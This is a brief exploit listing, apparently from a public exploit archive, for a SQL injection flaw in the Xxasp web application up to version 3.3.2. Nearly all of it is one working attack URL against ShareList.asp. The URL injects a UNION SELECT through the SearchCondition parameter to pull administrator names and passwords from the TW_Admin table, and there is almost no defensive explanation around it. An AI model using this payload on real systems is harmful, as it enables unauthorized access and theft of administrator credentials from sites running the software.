id: 10046
date: 11/30/2009
title: Xxasp <= 3.3.2 SQL Injection
author: Securitylab
cves: 

============================
Xxasp <= 3.3.2 SQL Injection
============================

#################################################################
# Name: Xxasp
# Version: 3.3.2
#################################################################
#===========================================================
# http://server/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1
#===========================================================
#################################################################


#  0day.today [2023-03-26]  #